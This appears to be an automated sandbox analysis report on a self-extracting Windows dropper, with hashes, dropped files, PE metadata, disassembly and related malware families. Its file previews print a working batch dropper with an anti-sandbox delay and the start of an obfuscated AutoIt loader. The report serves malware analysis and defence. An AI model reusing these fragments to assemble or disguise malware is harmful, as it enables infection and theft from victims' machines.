                                                                                          c2.htaGet hashmaliciousXWormBrowse
                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                              PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                                                  NIENrB5r6b.exeGet hashmaliciousXWormBrowse
                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comsEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                      ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                        payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                          fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                            Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                Agreement for Cooperation.PDF.lnk.download.lnkGet hashmaliciousRedLineBrowse
                                                                                                                  malware.zipGet hashmaliciousUnknownBrowse
                                                                                                                    Dark_drop_2_pers_lum_clean.exe.bin.exeGet hashmaliciousLummaC, DarkGate, LummaC Stealer, MailPassViewBrowse
                                                                                                                      Agreement for YouTube cooperation.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):893608
                                                                                                                        Entropy (8bit):6.620131693023677
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: sEOELQpFOB.lnk, Detection: malicious, Browse
                                                                                                                        • Filename: ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk, Detection: malicious, Browse
                                                                                                                        • Filename: payload_1.hta, Detection: malicious, Browse
                                                                                                                        • Filename: fsg5PWtTm2.lnk, Detection: malicious, Browse
                                                                                                                        • Filename: Whatsapp-GUI.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Whatsapp-GUI.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious, Browse
                                                                                                                        • Filename: malware.zip, Detection: malicious, Browse
                                                                                                                        • Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Chirurgo.adt

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:ASCII text, with very long lines (363), with CRLF, CR, LF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):958194
                                                                                                                        Entropy (8bit):5.840150717371117
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:VBSUEM+wS/ecIEBA4xgtQlJeqjCArINBCNBXQ2jq62+CVJUUU1:AHW8
                                                                                                                        MD5:DBCBEC4AA97661B5DA5B1F1A41DD08B1
                                                                                                                        SHA1:A4B743D55D2F73540A5540EC1D8BF3254D8A4BF9
                                                                                                                        SHA-256:957E1A3F22AB7DED970DDF1D7833D8F2CEE98D77C112A8ABEE053200AF2207BE
                                                                                                                        SHA-512:DED06204495E9CC9C907A40B9A15D75D09F00E7B24727C6E45B97D3CA7A64CA0D340113A86309BE146C67EFB1E6A4A64CA6F6330D2F07F89EFF25A022F5D5EF0
                                                                                                                        Malicious:false
                                                                                                                        Preview:Local $GRKTyzN = REYmrhU("75*90*102*85*77*81*102*89*117*70*85*76*87*103*120*107*125*84*82*105*115*124*71*75*71*120*114*119*116",5)..#NoTrayIcon....Func OYrlyFQpmkQCNau($aPb,$ThYk,$fNuWulZv,$Ubnc,$rsOs,$StPfCllr,$BULyZcde,$DtGC,$djMUx)..Local $tVlaEAnEMWulUuosnZMqgkjufNnePdPIeMQPVHQPDnRomavp = 'ccxIMATJrrQwvOcibiodzvRoWvPxtGWsgYxUxqdjXuRDqOiKcwekgTKYEjLfKnFvumMbxBMbQWzjEhoogyZrELrcgcdofwBnBxbBeKfTgExambxdrC'...$mfiZRXNMJJHjzR = 117..$GAsKuZbvmB = 76..While ((8533-8532)*8118)..Switch $mfiZRXNMJJHjzR..Case 110....$FlKhJRiWStIDezp = Execute(REYmrhU("71*117*108*121*104*74*104*119*86*104*117*108*100*111*43*42*72*101*73*74*107*107*82*113*86*118*100*106*116*75*118*102*90*42*44",3)), $KKuAuZxit = 'rfkhbiueaMCSLGBDaHhlOfQtBZStdGjypUcDytRSAgrpFRZAYCGNUUy'..$54 = 135..For $jdmshzfJDaclXtelrVjnnfXJlNhUOSvoaRzfXRljUwKdcWZOebmiiKmXzP = 9 To 22..Local $bfeLLAvJQkYbhPxJ = 'kHmKZayOZmlfPGtZzzDbDsIooogZtaXmlFCRHwbWWXMwjxwETnU'..Local $FlKhJRiWStIDezp = Execute(REYmrhU("86*119*117*108*113*106*76*118*73*11

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ideale.adt

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):491
                                                                                                                        Entropy (8bit):5.756816586896379
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:TApafzZSfWq8S9BWzZKlY0EwquHFL35v2mPgD00VE40OS90n:Zbk+zw08lY0uulD52mID00Vf0Of
                                                                                                                        MD5:75868819B9DD1508A5BE6F0221936C68
                                                                                                                        SHA1:2E3A918DE2BA31C304163EB23F6AEE5E338A9E0E
                                                                                                                        SHA-256:8513B1F3DF70DF4B610E6BF593FFBDC25BA8AADD6C9A7F8D62322490B41CF863
                                                                                                                        SHA-512:7C17E7449BB6EE4337F9BFFD5436E9FDBDD675DEFBF24B44C160B8B6ED07F7154BC5EFDF2EA364D3ECA94B890277B3FFAB45B19973ADCEDBC1296B4CFEC665F5
                                                                                                                        Malicious:false
                                                                                                                        Preview:Set ZnAryZJennDHBZRKoFEQiclC=DESKTOP-..Set NgVKmsqkDvrmEKBmhxDJDpz=QO5QU33..Set woTBZcmVHBatcStZsRsLCOXeIQpV=MZ..if %userdomain%==%ZnAryZJennDHBZRKoFEQiclC% ping 127.0.0.1 -n 600..<nul set /p = "%woTBZcmVHBatcStZsRsLCOXeIQpV%" > Appartenga.exe.com..findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt >> Appartenga.exe.com"..copy Chirurgo.adt S..start Appartenga.exe.com S..ping 127.0.0.1 -n 30....

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Poi.adt

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):103816
                                                                                                                        Entropy (8bit):7.998067335695939
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:lGnRzOzeL6RXCWYBE9jPHI/r/Ri5Vbryc:8nRzmeLsCjBE9j/I/k5V/
                                                                                                                        MD5:B2815D6253BFF6941901A21CBE38080F
                                                                                                                        SHA1:3DB449BE920267395592F994CDB31CB89C9BD690
                                                                                                                        SHA-256:A7DA9150D5E0FC2EDC3B97B92794999934D6A55A12A7D1D93C7023524B918DBC
                                                                                                                        SHA-512:C1B44E695620B71753BC285C1299BB3C6DB089EDC6A800726C02853201524ACA79BB8550937B2AD2883384F454814EE29A5D64D7D79EA2A6E3EF420DBC131C10
                                                                                                                        Malicious:false
                                                                                                                        Preview:..hn...w.!...A.Ma.&....1..=....c.B..4...h*.....<.H.Z5.......o.H.7...*h.c.+.>`..&.](.V..t....F.}..gc/.Gs.y\S._v..a....x.}..o."k..&....L`...e...6BD.n`..r.3.}...).MeY.v.{.[{.....T.~..u../...&P......... .w..=..}...`...Y .>..]^W+8....b....r.Z^O.._.T+.6OA....~..@..{y..J.....h#.....%.g...bT.gn.......-....o#./%....T..}..[...y../..i.`<.......#6.....Zl.O.y..W..FDE..QvRDyb.Y.GGH....8y.a>UZ2...K.\...0..!3K...2F......O.S..!..]...@j...*..>....6..i........,O.]r......f..S...E..]..T..2.[9..Vy.5]...4......./rSl..X...OUs....&..W,....e3.p...&]`.|F..\(q<._.$....g6|.7xpA}...)m...l..2..*.|.U#z:..t.@.S......Q..]...T.........N.. .t.8.o+..w..h..N2....;..Q..M.\.;..I...MyC..G`.{.yR..Tr.~..hA......[#/..U..+..cg.('.}z.s]..9.s.....Z.>.n..3p.........q..>m!~.5.......].fah.p.H.A....K.(..$....$.V.O....'e..~.1n)W.......?.{o.~..... . ;..%...7@E...`..)@..J}....J:..!.p.?.u.q..5`.Z..j.r...k7...@....a}.-....#U.L.6..d{.,..1.dw3....]:. U....w8.b......Q4..IYP#".*3.%B..U.....#...."Q@.-..

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65440
                                                                                                                        Entropy (8bit):6.049806962480652
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                                                        MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                        SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                                                        SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                                                        SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: 8lOT1rXZp5.exe, Detection: malicious, Browse
                                                                                                                        • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                        • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                        • Filename: OR8Ti8rf8h.exe, Detection: malicious, Browse
                                                                                                                        • Filename: RFQ-004282A.Teknolojileri A.S.exe, Detection: malicious, Browse
                                                                                                                        • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                        • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                        • Filename: PQwHxAiBGt.exe, Detection: malicious, Browse
                                                                                                                        • Filename: P0J8k3LhVV.exe, Detection: malicious, Browse
                                                                                                                        • Filename: NIENrB5r6b.exe, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\S

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:ASCII text, with very long lines (363), with CRLF, CR, LF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):958194
                                                                                                                        Entropy (8bit):5.840150717371117
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:VBSUEM+wS/ecIEBA4xgtQlJeqjCArINBCNBXQ2jq62+CVJUUU1:AHW8
                                                                                                                        MD5:DBCBEC4AA97661B5DA5B1F1A41DD08B1
                                                                                                                        SHA1:A4B743D55D2F73540A5540EC1D8BF3254D8A4BF9
                                                                                                                        SHA-256:957E1A3F22AB7DED970DDF1D7833D8F2CEE98D77C112A8ABEE053200AF2207BE
                                                                                                                        SHA-512:DED06204495E9CC9C907A40B9A15D75D09F00E7B24727C6E45B97D3CA7A64CA0D340113A86309BE146C67EFB1E6A4A64CA6F6330D2F07F89EFF25A022F5D5EF0
                                                                                                                        Malicious:false
                                                                                                                        Preview:Local $GRKTyzN = REYmrhU("75*90*102*85*77*81*102*89*117*70*85*76*87*103*120*107*125*84*82*105*115*124*71*75*71*120*114*119*116",5)..#NoTrayIcon....Func OYrlyFQpmkQCNau($aPb,$ThYk,$fNuWulZv,$Ubnc,$rsOs,$StPfCllr,$BULyZcde,$DtGC,$djMUx)..Local $tVlaEAnEMWulUuosnZMqgkjufNnePdPIeMQPVHQPDnRomavp = 'ccxIMATJrrQwvOcibiodzvRoWvPxtGWsgYxUxqdjXuRDqOiKcwekgTKYEjLfKnFvumMbxBMbQWzjEhoogyZrELrcgcdofwBnBxbBeKfTgExambxdrC'...$mfiZRXNMJJHjzR = 117..$GAsKuZbvmB = 76..While ((8533-8532)*8118)..Switch $mfiZRXNMJJHjzR..Case 110....$FlKhJRiWStIDezp = Execute(REYmrhU("71*117*108*121*104*74*104*119*86*104*117*108*100*111*43*42*72*101*73*74*107*107*82*113*86*118*100*106*116*75*118*102*90*42*44",3)), $KKuAuZxit = 'rfkhbiueaMCSLGBDaHhlOfQtBZStdGjypUcDytRSAgrpFRZAYCGNUUy'..$54 = 135..For $jdmshzfJDaclXtelrVjnnfXJlNhUOSvoaRzfXRljUwKdcWZOebmiiKmXzP = 9 To 22..Local $bfeLLAvJQkYbhPxJ = 'kHmKZayOZmlfPGtZzzDbDsIooogZtaXmlFCRHwbWWXMwjxwETnU'..Local $FlKhJRiWStIDezp = Execute(REYmrhU("86*119*117*108*113*106*76*118*73*11

                                                                                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\San.adt

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):893726
                                                                                                                        Entropy (8bit):6.620361902406828
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:qdpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:ST3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                        MD5:1BB95270DEFCAFF91782A987B93DA148
                                                                                                                        SHA1:C83E1F00A4B9F6C0111A870A1C1532EAB909DE5F
                                                                                                                        SHA-256:D2D3BF721D6C6838F120A394B045F8F40A3995E83911A9B7E4DA19591AE7097E
                                                                                                                        SHA-512:E97EB879CF057F67E28AF43C0547C91F54C4B340FFEA1E75C33189FD4553980EC68B90158949F074EF1ED4CA19E2646CDDD294D376A952A052155155FAB871CA
                                                                                                                        Malicious:false
                                                                                                                        Preview:DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq........................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.887779819641419
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:2YLM6BQ9S3.exe
                                                                                                                        File size:1'721'467 bytes
                                                                                                                        MD5:7c86d24bf10f9a6970b3c7c86e455423
                                                                                                                        SHA1:390d4d70d950a0e0f1a2744296e841bf70024b8d
                                                                                                                        SHA256:128985f1be0a64f43674e4e287eda262713c5bc3288582d97d1463b15d2d35f7
                                                                                                                        SHA512:2ed282b054d77a4a38f57a1e95b3ed87d651a47c4ee4dac0185901cf9dfb024710dfd8fb48d2dfba19ef9462715866ac5bcf84c22712889d9099b671efc5cf7d
                                                                                                                        SSDEEP:49152:DAd13wMCDhEwBfmK4ie7SiAeOh2NmV8Xo1:DAd131eENDiPhIho1
                                                                                                                        TLSH:A98502A1F2DC84F5F0B768B288F39D7295F7657C9498042B629CB6366BF1342403EB16
                                                                                                                        File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......L.................(...........-.......@....@..................................r.......................................b...........H.................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:3270a28b89efbab6

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x412daf
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:
                                                                                                                        Time Stamp:0x4CF4C71C [Tue Nov 30 09:42:52 2010 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:a011f8d93026fd9f5e9442faeeff606d

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        push FFFFFFFFh
                                                                                                                        push 00415E28h
                                                                                                                        push 00412F40h
                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                        push eax
                                                                                                                        mov dword ptr fs:[00000000h], esp
                                                                                                                        sub esp, 68h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                        xor ebx, ebx
                                                                                                                        mov dword ptr [ebp-04h], ebx
                                                                                                                        push 00000002h
                                                                                                                        call dword ptr [004141DCh]
                                                                                                                        pop ecx
                                                                                                                        or dword ptr [0041A9A4h], FFFFFFFFh
                                                                                                                        or dword ptr [0041A9A8h], FFFFFFFFh
                                                                                                                        call dword ptr [004141E0h]
                                                                                                                        mov ecx, dword ptr [0041899Ch]
                                                                                                                        mov dword ptr [eax], ecx
                                                                                                                        call dword ptr [004141E4h]
                                                                                                                        mov ecx, dword ptr [00418998h]
                                                                                                                        mov dword ptr [eax], ecx
                                                                                                                        mov eax, dword ptr [004141E8h]
                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                        mov dword ptr [0041A9A0h], eax
                                                                                                                        call 00007FDC60B70ED2h
                                                                                                                        cmp dword ptr [00418770h], ebx
                                                                                                                        jne 00007FDC60B70DBEh
                                                                                                                        push 00412F38h
                                                                                                                        call dword ptr [004141ECh]
                                                                                                                        pop ecx
                                                                                                                        call 00007FDC60B70EA4h
                                                                                                                        push 0041804Ch
                                                                                                                        push 00418048h
                                                                                                                        call 00007FDC60B70E8Fh
                                                                                                                        mov eax, dword ptr [00418994h]
                                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                                        lea eax, dword ptr [ebp-6Ch]
                                                                                                                        push eax
                                                                                                                        push dword ptr [00418990h]
                                                                                                                        lea eax, dword ptr [ebp-64h]
                                                                                                                        push eax
                                                                                                                        lea eax, dword ptr [ebp-70h]
                                                                                                                        push eax
                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                        push eax
                                                                                                                        call dword ptr [004141F4h]
                                                                                                                        push 00418044h
                                                                                                                        push 00418000h
                                                                                                                        call 00007FDC60B70E5Ch

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x162b40xc8.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000xc4804.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x140000x364.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x126600x1280073c0b500124224d847fc87e6472c46c4False0.609375data6.599820247935802IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x140000x34f00x36005b64bb0d022e45bbd4add5c7ca6ebea5False0.43287037037037035data5.4864421902497895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x180000x29ac0x800ca238ab0a3cf0e4f5d787bc3bc113d57False0.45263671875data3.828802525078782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x1b0000xc48040xc4a0011b22758df36b899352052fa19e2231aFalse0.8478151819771138data7.738025797009467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        TXT0x1b5100xc280dataEnglishUnited States1.0005221722365039
                                                                                                                        TXT0x277900x1a498dataEnglishUnited States1.0003807860910914
                                                                                                                        RT_ICON0x41c280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.18670886075949367
                                                                                                                        RT_ICON0x524500x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.28694555392053817
                                                                                                                        RT_ICON0x5b8f80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.32042513863216265
                                                                                                                        RT_ICON0x60d800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.29080066131317905
                                                                                                                        RT_ICON0x64fa80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.379149377593361
                                                                                                                        RT_ICON0x675500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4294090056285178
                                                                                                                        RT_ICON0x685f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5405737704918033
                                                                                                                        RT_ICON0x68f800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6152482269503546
                                                                                                                        RT_DIALOG0x693e80x1bedataEnglishUnited States0.5650224215246636
                                                                                                                        RT_DIALOG0x695a80x2e0dataEnglishUnited States0.43478260869565216
                                                                                                                        RT_DIALOG0x698880x120dataEnglishUnited States0.5138888888888888
                                                                                                                        RT_DIALOG0x699a80xf8dataEnglishUnited States0.6290322580645161
                                                                                                                        RT_DIALOG0x69aa00x1bcdataEnglishUnited States0.5112612612612613
                                                                                                                        RT_DIALOG0x69c5c0x61adataEnglishUnited States0.41613316261203587
                                                                                                                        RT_DIALOG0x6a2780xd2dataEnglishUnited States0.6571428571428571
                                                                                                                        RT_RCDATA0x6a34c0x249e7dataEnglishUnited States1.0003733557346774
                                                                                                                        RT_RCDATA0x8ed340x2d6dcdataEnglishUnited States1.0003546937810357
                                                                                                                        RT_RCDATA0xbc4100x22de6dataEnglishUnited States1.0003570878436094
                                                                                                                        RT_GROUP_ICON0xdf1f80x76dataEnglishUnited States0.7542372881355932
                                                                                                                        RT_VERSION0xdf2700x24cdataEnglishUnited States0.4931972789115646
                                                                                                                        RT_MANIFEST0xdf4bc0x346ASCII text, with CRLF line terminatorsEnglishUnited States0.5083532219570406

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        COMCTL32.dll
                                                                                                                        SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                                                                        GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                                                                        ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                                                                        USER32.dllReleaseDC, CopyImage, GetParent, GetWindowRect, wsprintfA, CreateWindowExW, SetTimer, GetWindowDC, DispatchMessageW, KillTimer, DestroyWindow, CharUpperW, EndDialog, SendMessageW, wsprintfW, SetWindowPos, GetMenu, GetWindowLongW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetMessageW, SetWindowTextW, MessageBoxA, GetKeyState, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, GetSysColor, ScreenToClient
                                                                                                                        ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                                                                        OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
